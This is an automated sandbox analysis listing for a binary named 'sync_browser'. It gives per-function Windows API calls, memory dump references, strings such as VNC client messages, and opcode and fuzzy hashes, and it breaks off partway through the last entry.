                                                                    Function 00007FF6DC0D7650 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 79sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32 ref: 00007FF6DC0D7720
                                                                      • Part of subcall function 00007FF6DC0D7A30: SetEvent.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A4B
                                                                      • Part of subcall function 00007FF6DC0D7A30: SetEvent.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A55
                                                                      • Part of subcall function 00007FF6DC0D7A30: SetEvent.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A5F
                                                                      • Part of subcall function 00007FF6DC0D7A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A8B
                                                                      • Part of subcall function 00007FF6DC0D7A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A95
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$CriticalInitializeSection$Sleepmalloc
                                                                    • String ID: keyEvent$start_event$stop_event
                                                                    • API String ID: 367317321-1979648887
                                                                    • Opcode ID: 75cee7831a348fbdeec11479aba58ed98617e6988499cf48a05d465c35e79d83
                                                                    • Instruction ID: 841fff286c542258a8fd3359a68f88f82a70ccd44a0a9944936c69e3ab98ed47
                                                                    • Opcode Fuzzy Hash: 75cee7831a348fbdeec11479aba58ed98617e6988499cf48a05d465c35e79d83
                                                                    • Instruction Fuzzy Hash: 8C31AB24E2DB1B81FA50AB18E55077C23909FC8744F440136DA4ECBBA6DF7EE0678B81
                                                                    Function 00007FF6DC0F5940 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
                                                                    • String ID: G
                                                                    • API String ID: 2834860089-985283518
                                                                    • Opcode ID: 1d474c01279c2a9434e3c4812ff55c46e0b017860c5d5c7f73ec849190a36a26
                                                                    • Instruction ID: b5bce22b17d4ccb77b11c49897d8c29169a78a187886d6540be958d57079b2b4
                                                                    • Opcode Fuzzy Hash: 1d474c01279c2a9434e3c4812ff55c46e0b017860c5d5c7f73ec849190a36a26
                                                                    • Instruction Fuzzy Hash: 6331743291C79586E7108F24E8443AC73A4FF44BA4F440236DA9D87AD4CF7CD4A6C701
                                                                    Function 00007FF6DC1799CC Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 2819658684-0
                                                                    • Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                    • Instruction ID: eddb2292154b9a08c5d70a7383dfe4c818d02493004d3bfd6477650251af7d95
                                                                    • Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                    • Instruction Fuzzy Hash: 0F215021E1D66B85FB515B219C0137E6299AF45BC0F445432EA8DC7BC5DE2CE427A700
                                                                    Function 00007FF6DC0CA290 Relevance: 6.1, APIs: 4, Instructions: 57comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 948891078-0
                                                                    • Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                    • Instruction ID: b69754f4fe90dfa261b09a524cedd2c7a11c3c9b22179fb26819b369eeac6e82
                                                                    • Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                    • Instruction Fuzzy Hash: B0214172A1CB5982E7108F69E85426E73A4FB88B54F501232EBAEC3794DF7DD456CB00
                                                                    Function 00007FF6DC131660 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$FreeUnlock
                                                                    • String ID:
                                                                    • API String ID: 1239146723-0
                                                                    • Opcode ID: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                                    • Instruction ID: 9629e48fc59a5529ceb0fb79504f082d567bf11d6936a8eb95804861728e35a2
                                                                    • Opcode Fuzzy Hash: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                                    • Instruction Fuzzy Hash: B6213D31A19A6981FB009F51F85016C63A8FF84B88F180436EA5DC7759CF7CD8A38740
                                                                    Function 00007FF6DC113690 Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Write$ConsoleDebugFileHandleOutputString
                                                                    • String ID:
                                                                    • API String ID: 1934604790-0
                                                                    • Opcode ID: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                                    • Instruction ID: a796bc25ae7945ebf450e1f27a8a94e0027f83c1df68db5f3324fa19516ac4d8
                                                                    • Opcode Fuzzy Hash: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                                    • Instruction Fuzzy Hash: C611BF25608AA440E7508B39A8043ADB7A5EB45FB4F584326EEBD47BD8CF3CC4A7C300
                                                                    Function 00007FF6DC184FA8 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _amsg_exit$_getptd_lockfree
                                                                    • String ID:
                                                                    • API String ID: 2148533958-0
                                                                    • Opcode ID: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                    • Instruction ID: bc8f87a0d095b434c16d962082544419fe64ffc8871039a6522f27867ffaa416
                                                                    • Opcode Fuzzy Hash: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                    • Instruction Fuzzy Hash: 78117C22A1DA6992FA849B11DD40BBD7268FF48740F490137EA0E83395CF3CE476C741
                                                                    Function 00007FF6DC1579A0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
                                                                    • String ID:
                                                                    • API String ID: 1747828912-0
                                                                    • Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                    • Instruction ID: a6e335cfa493dcab33257559a051291e5cc0b40138caecbf96d8b2e22e33fd2b
                                                                    • Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                    • Instruction Fuzzy Hash: D0111A72A28B6997E7048F25EA8415D77A8FB48B90F10513BEB5D83B50CF78E476CB40
                                                                    Function 00007FF6DC0E92C0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32 ref: 00007FF6DC0E92F0
                                                                      • Part of subcall function 00007FF6DC157520: EnterCriticalSection.KERNEL32 ref: 00007FF6DC157534
                                                                      • Part of subcall function 00007FF6DC157520: ReleaseSemaphore.KERNEL32 ref: 00007FF6DC157577
                                                                      • Part of subcall function 00007FF6DC157520: GetLastError.KERNEL32 ref: 00007FF6DC157581
                                                                      • Part of subcall function 00007FF6DC157520: LeaveCriticalSection.KERNEL32 ref: 00007FF6DC15758C
                                                                      • Part of subcall function 00007FF6DC157400: EnterCriticalSection.KERNEL32 ref: 00007FF6DC157427
                                                                      • Part of subcall function 00007FF6DC157400: LeaveCriticalSection.KERNEL32 ref: 00007FF6DC157472
                                                                      • Part of subcall function 00007FF6DC157400: LeaveCriticalSection.KERNEL32 ref: 00007FF6DC15747B
                                                                      • Part of subcall function 00007FF6DC157400: WaitForSingleObject.KERNEL32 ref: 00007FF6DC15748A
                                                                      • Part of subcall function 00007FF6DC157400: EnterCriticalSection.KERNEL32 ref: 00007FF6DC157495
                                                                      • Part of subcall function 00007FF6DC157400: GetLastError.KERNEL32 ref: 00007FF6DC1574A7
                                                                      • Part of subcall function 00007FF6DC157400: EnterCriticalSection.KERNEL32 ref: 00007FF6DC1574DE
                                                                      • Part of subcall function 00007FF6DC157400: LeaveCriticalSection.KERNEL32 ref: 00007FF6DC157500
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
                                                                    • String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
                                                                    • API String ID: 1962697109-2518527632
                                                                    • Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                    • Instruction ID: a961e607f9ad4f3598ca706926c01f5a2b04a0e142d27759faae9923d83d04a5
                                                                    • Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                    • Instruction Fuzzy Hash: 41118E71A28A8682EB048F25E8003FD2365FB84BA4F084236DA1EC73E9DF3CD416C710
                                                                    Function 00007FF6DC0D7960 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$DeleteEnterEventLeave
                                                                    • String ID:
                                                                    • API String ID: 3772564070-0
                                                                    • Opcode ID: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                    • Instruction ID: 980fb3bad25d843529a95ef36392b854b8caadc6f35240dca13735706287b91e
                                                                    • Opcode Fuzzy Hash: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                    • Instruction Fuzzy Hash: 1C21D625A2DF5A82FB15DB15E99437C23A0AF98B44F540133C90EC6BA1CF7DA4A7C702
                                                                    Function 00007FF6DC0D9570 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Escape$Release
                                                                    • String ID:
                                                                    • API String ID: 2350829361-0
                                                                    • Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                    • Instruction ID: 548bf98d32a96d0c5923930e27b436b33030ec934dc6522082737c4fb8330ab4
                                                                    • Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                    • Instruction Fuzzy Hash: BCF06D3261865583EB209B20BD55A2EB2A5FB88784F544136DE5E42E24CE3CD022CB04
                                                                    Function 00007FF6DC185878 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _amsg_exit_getptd$_lock
                                                                    • String ID:
                                                                    • API String ID: 3670291111-0
                                                                    • Opcode ID: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
